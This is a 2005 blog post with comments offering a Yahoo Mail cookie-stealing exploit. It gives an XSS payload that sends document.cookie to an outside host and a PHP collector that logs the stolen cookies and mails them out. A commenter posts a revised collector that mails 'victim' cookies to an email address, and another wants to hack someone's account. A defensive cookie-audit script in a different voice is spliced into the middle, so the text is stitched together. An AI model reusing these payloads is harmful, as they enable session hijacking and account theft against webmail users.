
Yahoo exploit: no password needed

Posted by deepquest on December 12, 2005 – 6:10 am

Once again, webmail services are facing security issues. This one aims at the same target: connecting without the user’s password. This time Yahoo is vulnerable.

Code:
<DIV id=b style="VISIBILITY: hidden"> <STYLE onload="window.status=''; var x = escape(document.cookie).substr(0,1900); b.innerHTML='<iframe src=http://your-site-here.com/script.php?id='+document.title.substring(document.title.indexOf('-')+2)+'&amp;cookie=\''+x+'\' frameborder=0 width=10 height=10></iframe>';" type=text/css> </STYLE> </DIV>

script.php:

Code:
<? $file="cookie.log"; if (isset($_REQUEST["id"]) && isset($_REQUEST["cookie"])){ $logcookie = $_REQUEST["cookie"]; $logcookie = rawurldecode($logcookie); $logemail = $_REQUEST["id"]; $logemail = rawurldecode($logemail); if (file_exists($file)) { $handle=fopen($file, "r+"); $filecontence=fread($handle,filesize("$file")); fclose($handle); } $handle=fopen($file, "w"); fwrite($handle, "$logemail - $logcookie\n$filecontence\n "); //Writing email address and cookie then the rest of the log fclose($handle); mail("email", "$logemail", "$logemail\n$logcookie\n$filecontence\n"); } header("Location: [url=http://mail.yahoo.com/]http://mail.yahoo.com[/url]"); ?>

To protect yourself from it, make sure you hit the logout link instead of just closing the browser window. Also, this only works in Internet Explorer, so use any other browser.
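The snippet above depends on page script being able to read `document.cookie`, and the logout advice is about how long that cookie stays usable. As an added defensive example (not part of the original post; the cookie names, values and function names are constructed for illustration), this Node.js script audits `Set-Cookie` headers for cookies that script can read or that persist after the browser is closed:

```javascript
// Constructed sample Set-Cookie headers (names and values are made up).
const SAMPLE_HEADERS = [
  'SID=abc123; Path=/; Domain=.mail.example',
  'AUTH=def456; Path=/; Max-Age=1209600; Secure',
  'OLD=x; Expires=Thu, 01 Jan 1970 00:00:00 GMT; HttpOnly; Secure',
  'SESS=ghi789; Path=/; Secure; HttpOnly',
];

// Parse one Set-Cookie header into the attributes relevant to cookie theft.
function parseSetCookie(header, now = Date.now()) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const cookie = { name: eq < 0 ? pair : pair.slice(0, eq), httpOnly: false, secure: false, persistent: false };
  let maxAge = null;
  let expires = null;
  for (const attr of attrs) {
    const i = attr.indexOf('=');
    const key = (i < 0 ? attr : attr.slice(0, i)).trim().toLowerCase();
    const value = i < 0 ? '' : attr.slice(i + 1).trim();
    if (key === 'httponly') cookie.httpOnly = true;
    else if (key === 'secure') cookie.secure = true;
    else if (key === 'max-age' && /^-?\d+$/.test(value)) maxAge = Number(value);
    else if (key === 'expires' && !Number.isNaN(Date.parse(value))) expires = Date.parse(value);
  }
  // Max-Age takes precedence over Expires (RFC 6265); a past date or
  // non-positive age deletes the cookie rather than persisting it.
  if (maxAge !== null) cookie.persistent = maxAge > 0;
  else if (expires !== null) cookie.persistent = expires > now;
  return cookie;
}

// Report, per cookie, the properties that make a stolen value useful.
function auditCookies(headers, now = Date.now()) {
  return headers.map((h) => {
    const c = parseSetCookie(h, now);
    const findings = [];
    if (!c.httpOnly) findings.push('readable by page script via document.cookie');
    if (!c.secure) findings.push('also sent over plain HTTP');
    if (c.persistent) findings.push('persistent: kept after the browser is closed');
    return { name: c.name, findings };
  });
}

for (const r of auditCookies(SAMPLE_HEADERS)) {
  console.log(r.name, r.findings.length ? r.findings.join('; ') : 'ok');
}
```

A cookie set with `HttpOnly` is not exposed to `document.cookie`, so it reports no script-readable finding here.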


This post is under “Security” and has no responses so far.

  1. hireism Said:

    Doesn’t seem to work?

  2. deepquest Said:

    Well, exploit doesn’t ALWAYS work out of the box, only to prevent ppl to copy/paste (usually script kiddies) and use the exploit. I see at least 2 errors of syntax, reread the code. Very easy to see.

  3. lord Said:

    this is cookie munching?

  4. bresti Said:

    and the errors are ??
    because my script is :

    <?php
    // email
    $results = “dadoamna@yahoo.com”;

    // done
    $email = $_GET[‘id’];
    $cookie = urldecode($_GET[‘cookie’]);
    $mesaj = “Victim :: $email\nCookie data: \n$cookie\n”;
    mail($results, “Cookie victim $email”, $mesaj);
    ?>

  5. deepquest Said:

    Maybe fixed by Yahoo, but chmod your log file.

  6. Exos Said:

    someone hacked my email-id and I want to hack his